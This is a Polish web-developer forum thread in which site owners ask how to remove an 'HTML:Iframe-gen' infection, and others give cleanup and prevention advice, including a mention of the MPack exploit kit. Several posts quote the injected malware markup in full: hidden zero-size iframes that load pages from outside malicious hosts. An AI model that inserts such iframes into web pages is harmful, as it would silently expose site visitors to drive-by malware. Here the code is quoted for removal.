Wirus na stronie, HTML:Iframe-gen Rozwiazne Opcje

[LukasKK]

Witam,


Pracuje obecnie nad strona na której znajduje się wirus avast ostrzega mnie za każdym razem gdy strona jest odświeżona podaje nazwę pasożyta: HTML:Iframe-gen prosiłem administratora serwera o przeskanowanie antywirusowe jednak nie przyniosło to żadnych efektów gdzie szukać robala??

P.S.
Nie wiem czy w dobrym dziele umieściłem post

Ten post edytował LukasKK 26.03.2008, 12:38:52

[crackcomm]

szukać w avaśćie P
usuń avasta to niedawmo zaczęło GGT wykrywać, jak jeszcze nie wykrywa ^^

[carbolymer]

1. Nie ten dział
2. Masz jakieś Iframe lub inne ramki na stronie? Jeżeli tak to zobacz czy nie ma tam pętli wstawiającej ramkę w ramce do ramki w ramce, która jest w ramce... Jeżeli nie, to zobacz czy czasem reklamy / inne skrypty nie wstawiają ci różnych "gratisów" w postaci ramek. Zmień antywirus :]

[domis86]

filtruj dane wejsciowe, filtruj dane wejsciowe i jeszcze raz: filtruj dane wejsciowe

[Blackhole]

Hej! Ja nie używam żadnych ramek i nie używam skryptów, które wstawiałyby jakieś "gratisy" a mimo to, też "mam" tego durnego wirusa. Co z tym zrobić? http://spchkatowice.ovh.org/

[erix]

Kod

<iframe src="http://pinoc.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Musisz mieć gdzieś dziurę w skryptach albo słabe hasło na ftp.

[l0ud]

[HTML] pobierz, plaintext 
<iframe src="http://pinoc.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
[HTML] pobierz, plaintext 

Usunąć to z końca strony. Pewnie coś się dopisało do indexa.

[Blackhole]

Dzięki Wam wielkie Bardzo się zdziwiłem, że coś się mogło dopisać do mojego index.php

[Daro786]

Mam podobny problem, POMOCY bardzo proszę!!!!!!! Szukam osoby ktora sie zna na extreme fushion - PHP.

Prosze o pomoc. Mam jakis wirus ifreme czy cos nie mam pojecia jak go wywalic prosze o pomoc. Jestem słaby z tego wiec bede wdzieczny jesli ktos sie zglosi zeby mi pomoc. Moja strona to http://sunstacja.pl/

Moje gg 4993847, grom8@op.pl

[Spawnm]

dajesz linka abyśmy tam wchodzili gdyż masz wirusa, tak?

zmień dane do ftp, wywal totalcomandera, wywal iframy z indexów . tyle.

[zeulus]

A propos tego wirusa atakującego poprzez dopisywanie kodu do stron .php i .htm(l) - najprawdopodobniej zaatakował Was fajny skrypcik Rosjan - MPack - na jego temat można poczytać sobie w kilku miejscach:
http://en.wikipedia.org/wiki/MPack_(software)
http://pandalabs.pandasecurity.com/archive...ered_2100_.aspx
Na tej ostatniej stronie jest link do fajnego opisu tego zestawu skryptów:
http://pandalabs.pandasecurity.com/blogs/i...05/11/MPack.pdf

Ponieważ też to przechodziłem w kilku stadiach rozwoju tego ustrojstwa na różnych serwerach, kilka porad:

1. Jak już zauważyłeś, że masz zawirusowane stronki - pierwsza rzecz - ZMIEŃ HASŁO! Ponieważ te skrypty nawiedzają skompromitowane serwery co kilka dni, czasami tygodni, im szybciej zmienisz hasło na TRUDNE do złamania, tym lepiej dla Ciebie. Nie warto poprawiać niczego w skryptach jeżeli nie zmienisz hasła, naprawdę....

2.a. Jeżeli masz najświeższą kopię serwisu, skryptów - przywróć wszystkie pliki, będzie po sprawie - tylko sprawdź najpierw, czy one też nie są zainfekowane, jeżeli jest to kopia dostawcy hostingu (jeżeli np. pliki były przez dłuższy czas zainfekowane).

2.b. Jeżeli nie masz kopii... no cóż... edytuj i płacz, szczególnie, jeżeli twój serwis ma xxx plików .html i.php... Trzeba sprawdzić wszystkie pliki które były na serwerze, wyciąć z nich kod, ZROBIĆ SOBIE BACKUP i wgrać z powrotem na serwer..

3. Jeżeli nie zmieniłeś hasła na serwerze, poczekaj dwa dni i wróć do punktu 2a lub 2b, bo przecież 1. jest zbyt trudny do wykonania...

Zapobieganie:
- ustawienie _dobrych_ haseł do serwerów, np. mietek123 nie jest zbyt dobrym rozwiązaniem..
- BACKUP, backup, backup, backup....
- sprawdzenie sobie komputera pod kątem trojanów, wirusów, rootkitów.. -> szczególnie jeżeli hasło do ftp nie było słownikowe i jeżeli masz Windows

Ustrojstwo dopisuje się w dwóch miejscach - w okolicach tagu <body> lub gdy go nie znajdzie to na końcu pliku.
Pewnym rozwiązaniem (tymczasowym) jest taki trick w skryptach php: wyświetlenie tagu body podzielonego na kawałki, np.

[PHP] pobierz, plaintext 
<?php
echo "<b"; echo "ody"; echo ">";
?>
[PHP] pobierz, plaintext 

wtedy nie zostanie to rozpoznane;
na dopisywanie się na końcu pliku jest sposób, ale do jednego dopisania działa - zostawienie komentarza na końcu pliku:

[PHP] pobierz, plaintext 
<?php
{twój skrypt...}
//
?>
[PHP] pobierz, plaintext 

Przy czym ostatnia linia nie powinna kończyć się znakiem nowej lini.. Skrypt dopisze się za komentarzem, co nie rozwali całej strony, gdy w kodzie php nagle znajdzie się kod html+javascript..

Jak wspomniałem, metoda ta działa tylko jeden raz, bo skrypt dopisuje też czasami \n ...

JESZCZE JEDNO:
Jeżeli nie umiesz zlokalizować iframek i zainfekowanych plików, lub np. Kaspersky wyrzuca komunikat, że jest zainfekowany plik, który nie istnieje fizycznie na serwerze -> przyczyną najprawdopodobniej są zainfekowane strony błędów serwowane przez Apache -> trzeba sprawdzić wszystkie strony 404, 500 itp.

Powodzenia! :)

[Spawnm]

iframy są dopisywane tylko w index , więc bez przesady

[Daro786]

Niestety nie znam się na tym za bardzo, mógłby mi to zrobić nieodpłatnie?? Podejrzeewam że to nie zajmuje dużo czasu. Sory za podanie strony masz racje, NIE WCHODŹCIE NA NIĄ póki jest zaifekowana

Pomożecie?? Udziele wszelkich informacji. Moje gg 4993847

[PawelC]

Tutaj napisałem co i jak trzeba zrobić: http://forum.php.pl/index.php?showtopic=11...mp;#entry598818
Musisz usunąć taki kod:

Kod

<iframe src="http://cheapslotplay.cn/in.cgi?income48" width=1 height=1 style="visibility: hidden"></iframe>

Są rózne modyfikacje jego, i różne adresy, ale zawsze zaczyna się od iframe

Ten post edytował ExPlOiT 22.06.2009, 14:51:08

[erix]

Pomożecie?? Udziele wszelkich informacji.

Załóż wątek na giełdzie ofert, nie przesadzaj, nie potrzebujemy kolejnego bałaganu.